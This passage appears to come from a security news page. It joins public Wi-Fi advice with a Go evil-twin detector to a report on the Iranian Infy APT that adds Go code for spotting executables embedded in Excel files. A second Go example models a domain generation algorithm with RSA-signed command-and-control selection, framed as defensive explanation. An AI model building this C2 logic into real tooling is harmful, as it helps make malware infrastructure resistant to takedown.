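		if out[i].SSID != out[j].SSID {
			return out[i].SSID < out[j].SSID
		}
		return out[i].Reason < out[j].Reason
	})
	return out
}

func main() {
	for _, f := range FlagEvilTwins(SampleScan(), []string{"Airport_Free_WiFi"}) {
		fmt.Printf("%-22s %s\n", f.SSID, f.Reason)
	}
}
```

Running it against the constructed scan flags the open clone of Airport_Free_WiFi and the case-variant Airport_Free_Wifi, and nothing else. Wi-Fi names are compared case-sensitively by devices, so a one-letter case change is a different network to your laptop but the same network to a hurried eye. Note also that a device which once joined an open network with that name will rejoin any access point broadcasting it without asking, which is why the later advice about clearing stored networks matters.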

Experts note that the consequences reach beyond individual privacy, particularly for business travelers, whose personal laptops and smartphones, now routinely used for remote work, can become entry points into corporate systems. Many voices across the industry have stressed taking preventive measures in advance rather than relying on technical expertise in the moment.

One of the most widely accepted safeguards on public networks is a Virtual Private Network, which establishes an encrypted tunnel between the device and an external server so that the local network sees only ciphertext. In 2024, Eric Plam, a senior executive at mobile hotspot provider SIMO, said VPN frameworks provide a security buffer between devices and the servers they access, an important measure in congested terminals where digital surveillance is easier to carry out.

Encryption is not the only reason VPNs have gained popularity among frequent travelers; ancillary benefits such as comparing airfares and hotel prices as they appear in other regions are another. Because airlines calibrate pricing by market, analysts have observed that regions including India, Malaysia, Thailand, Mexico, Argentina, Brazil, Sri Lanka, the Philippines, and Turkey are among the most cost-effective from which to purchase flights.

Security researchers have also highlighted alternative connectivity that avoids public networks altogether. With a physical international SIM card or a preactivated eSIM service such as Airalo's, travelers get mobile data access that does not depend on an unsecured wireless network.

The mobile industry is also working on device-level network privacy; Samsung, for instance, recently introduced enhanced public-network security protections for its smartphones, which improve users' odds of connecting to open networks without data theft. Even so, digital defense specialists maintain that the safest network is usually the one a traveler does not have to use.

On public Wi-Fi, authorities and independent experts have consistently urged passengers to avoid logging into banking platforms, email portals, internal dashboards, or any other authentication-protected service while connected.

As a precaution, travelers are advised to download boarding passes, tickets, media libraries, podcasts, and playlists before arriving at the terminal, reducing both the risk and the dependence on free wireless internet.

Security experts say that as travel becomes more digitized, the conversation must shift from awareness to habit. Warnings about public charging ports and unsecured Wi-Fi are not meant to discourage travelers from connecting, but to change how they connect in transient environments where anonymity benefits attackers more than travelers.

Beyond pre-downloading essentials, cybersecurity analysts advise travelers to turn off automatic joining of known networks, keep their operating systems current, and periodically remove stored Wi-Fi networks. The reason is concrete: a device that remembers an open network will silently reconnect to any access point broadcasting the same name, which is exactly what a counterfeit hotspot counts on.

To secure devices used outside managed office networks, firms increasingly recommend browser isolation tools, encrypted cloud access gateways, and endpoint monitoring for corporate travelers. Industry observers also point to a silver lining.

As mobile security innovations accelerate, from encryption to device-level threat defense to the wider adoption of eSIMs, passengers have options that did not exist a decade ago. Even so, digital defense leaders keep reminding their clients that discipline is what keeps data secure.

Experts say that freedom of choice should never outweigh the cost of compromise, especially in decisions that affect millions of travelers each day. In an evolving travel-security landscape, they believe preparation, layered protection, and deliberate connectivity are what will make the safest journeys forward.

Iranian Infy Prince of Persia Cyber Espionage Campaign Resurfaces

Security researchers have identified renewed cyber activity linked to an Iranian threat actor known as Infy, also referred to as Prince of Persia, marking the group’s re-emergence nearly five years after its last widely reported operations in Europe and the Middle East. According to SafeBreach, the scale and persistence of the group’s recent campaigns suggest it remains an active and capable advanced persistent threat. 

Infy is considered one of the longest-operating APT groups, with origins traced back to at least 2004. Despite this longevity, it has largely avoided the spotlight compared with other Iranian-linked groups such as Charming Kitten or MuddyWater. Earlier research described a relatively focused toolkit built around two primary malware families: Foudre, a downloader and reconnaissance tool, and Tonnerre, a second-stage implant used for deeper system compromise and data exfiltration. Both are believed to be distributed primarily through phishing campaigns.

Recent analysis from SafeBreach reveals a previously undocumented campaign targeting organizations and individuals across multiple regions, including Iran, Iraq, Turkey, India, Canada, and parts of Europe. The operation relies on updated versions of both Foudre and Tonnerre, with the most recent Tonnerre variant observed in September 2025. Researchers noted a change in initial infection method: rather than traditional malicious macros, the attackers now embed executables directly within Microsoft Excel documents to start the malware deployment.
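A triage check for the infection method described above, as an added example (not SafeBreach's tooling or Infy's code): it opens an OOXML workbook as the zip package it is and flags parts under xl/embeddings/ that contain a PE header. The sample document is constructed inline and is not a real workbook; the heuristic is an assumption about how such embeddings usually look, applies only to .xlsx-style packages (legacy binary .xls is a different container), and will miss packed or otherwise obscured payloads.

```go
package main

import (
	"archive/zip"
	"bytes"
	"fmt"
	"io"
	"strings"
)

// dosStub is the string a linker places in the DOS header of every PE image.
const dosStub = "This program cannot be run in DOS mode"

// FindEmbeddedPE returns the names of parts under xl/embeddings/ that appear
// to wrap a Windows executable. Heuristic, not proof: an OOXML embedded
// object lives under xl/embeddings/, and a raw PE starts with "MZ" and
// carries the DOS stub string shortly after. Packed, encrypted or split
// payloads will not match.
func FindEmbeddedPE(doc []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(doc), int64(len(doc)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML package: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if !strings.HasPrefix(f.Name, "xl/embeddings/") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		mz := bytes.Index(data, []byte("MZ"))
		if mz >= 0 && bytes.Contains(data[mz:], []byte(dosStub)) {
			hits = append(hits, f.Name)
		}
	}
	return hits, nil
}

// BuildSampleXlsx constructs a minimal zip shaped like an .xlsx so the check
// can run offline. It is not a valid workbook and not a real sample: one
// benign OLE part, plus, if withPE is set, a part wrapping a PE-like blob.
func BuildSampleXlsx(withPE bool) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	add := func(name string, data []byte) {
		w, _ := zw.Create(name)
		w.Write(data)
	}
	// OLE compound file magic, as the real oleObjectN.bin parts start with.
	oleMagic := []byte{0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1, 0x1a, 0xe1}
	ole := func(parts ...[]byte) []byte {
		return bytes.Join(append([][]byte{oleMagic}, parts...), nil)
	}
	add("[Content_Types].xml", []byte("<Types/>"))
	add("xl/workbook.xml", []byte("<workbook/>"))
	add("xl/embeddings/oleObject1.bin", ole([]byte("harmless embedded object")))
	if withPE {
		pe := append([]byte("MZ\x90\x00"), bytes.Repeat([]byte{0}, 60)...)
		pe = append(pe, []byte(dosStub)...)
		add("xl/embeddings/oleObject2.bin", ole([]byte("Ole10Native"), pe))
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	hits, err := FindEmbeddedPE(BuildSampleXlsx(true))
	fmt.Println(hits, err)
}
```

The same walk generalises to any Office package: a Word document keeps its embeddings under word/embeddings/, and a mail gateway or sandbox can apply the check before the document is ever opened. Treat a hit as a reason to detonate the file, not as a verdict on its own.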

One of the most distinctive aspects of Infy's current operations is its resilient command-and-control infrastructure. The malware uses a domain generation algorithm to rotate C2 domains regularly, reducing the likelihood of takedowns. Each domain is authenticated with an RSA-based check, so compromised systems communicate only with attacker-approved servers: SafeBreach researchers observed that the implant retrieves an encrypted signature file from a candidate domain daily and validates it against a public key carried in the sample. The practical consequence is that a defender who registers a predicted DGA domain ahead of the operator still cannot produce a valid signature, so the implant ignores the sinkhole and moves on to the next candidate.
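As an added illustration of the signed-DGA scheme described in this paragraph (example code, not Infy's implementation or SafeBreach's analysis tooling): the domain generator, its seed, the label format and the TLD are assumptions chosen for the example, and the daily fetch of the signature file is modelled as a map lookup with the file's encryption omitted. The RSA-over-SHA-256 check is the part that carries the security property, and the demo shows why a domain registered by someone without the operator's private key is rejected.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"time"
)

// NewKey generates an RSA key pair. The demo uses one for the operator and
// one for an imposter who registers a DGA domain without the operator's key.
func NewKey() *rsa.PrivateKey {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return k
}

// GenerateCandidates is a hypothetical date-seeded DGA with the shape the
// report describes (a small daily batch of domains). It is not Infy's real
// algorithm: seed, hash construction, label length and TLD are assumptions.
func GenerateCandidates(seed string, day time.Time, n int) []string {
	out := make([]string, 0, n)
	for i := 0; i < n; i++ {
		h := sha256.Sum256([]byte(fmt.Sprintf("%s|%s|%d", seed, day.UTC().Format("2006-01-02"), i)))
		label := make([]byte, 12)
		for j := range label {
			label[j] = 'a' + h[j]%26
		}
		out = append(out, string(label)+".example")
	}
	return out
}

// SignDomain is the operator side: the "signature file" served from a domain
// is a PKCS#1 v1.5 signature over SHA-256(domain) by the operator's private key.
func SignDomain(priv *rsa.PrivateKey, domain string) []byte {
	digest := sha256.Sum256([]byte(domain))
	sig, err := rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, digest[:])
	if err != nil {
		panic(err)
	}
	return sig
}

// VerifyDomain is the implant side: a candidate is trusted only if the
// signature validates under the public key compiled into the sample.
func VerifyDomain(pub *rsa.PublicKey, domain string, sig []byte) bool {
	digest := sha256.Sum256([]byte(domain))
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, digest[:], sig) == nil
}

// SelectC2 walks the day's candidates in order and returns the first whose
// signature verifies. In the real implant the signature file is fetched from
// the domain itself; here the map stands in for that fetch.
func SelectC2(pub *rsa.PublicKey, candidates []string, sigs map[string][]byte) (string, bool) {
	for _, d := range candidates {
		if sig, ok := sigs[d]; ok && VerifyDomain(pub, d, sig) {
			return d, true
		}
	}
	return "", false
}

func main() {
	operator, imposter := NewKey(), NewKey()
	day := time.Date(2025, 9, 1, 0, 0, 0, 0, time.UTC)
	cands := GenerateCandidates("constructed-seed", day, 5)

	sigs := map[string][]byte{
		// A defender sinkholes the first candidate but can only sign with a
		// key the implant does not trust.
		cands[0]: SignDomain(imposter, cands[0]),
		// The operator registers and signs only the third candidate.
		cands[2]: SignDomain(operator, cands[2]),
	}
	c2, ok := SelectC2(&operator.PublicKey, cands, sigs)
	fmt.Printf("candidates: %v\nselected: %s (found=%v, operator domain=%v)\n", cands, c2, ok, c2 == cands[2])
}
```

The defensive reading is the useful one: predicting the DGA output lets you block or monitor the candidates, but registering them does not let you take the implants over, because the trust decision is made by a signature you cannot forge. Takedown therefore means going after the registrar accounts and hosting, or recovering the private key from operator infrastructure, rather than pre-registering domains.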

Further inspection of the group’s infrastructure uncovered structured directories used for domain verification, logging communications, and storing exfiltrated data. Evidence also suggests the presence of mechanisms designed to support malware updates, indicating ongoing development and maintenance of the toolset. 

The latest version of Tonnerre introduces another notable feature by integrating Telegram as part of its control framework. The malware is capable of interacting with a specific Telegram group through its C2 servers, allowing operators to issue commands and collect stolen data. Access to this functionality appears to be selectively enabled for certain victims, reinforcing the targeted nature of the campaign. 

SafeBreach researchers also identified multiple legacy malware variants associated with Infy’s earlier operations between 2017 and 2020, highlighting a pattern of continuous experimentation and adaptation. Contrary to assumptions that the group had gone dormant after 2022, the new findings indicate sustained activity and operational maturity over the past several years. 

The disclosure coincides with broader research into Iranian cyber operations, including analysis suggesting that some threat groups operate with structured workflows resembling formal government departments. Together, these findings reinforce concerns that Infy remains a persistent espionage threat with evolving technical capabilities and a long-term strategic focus.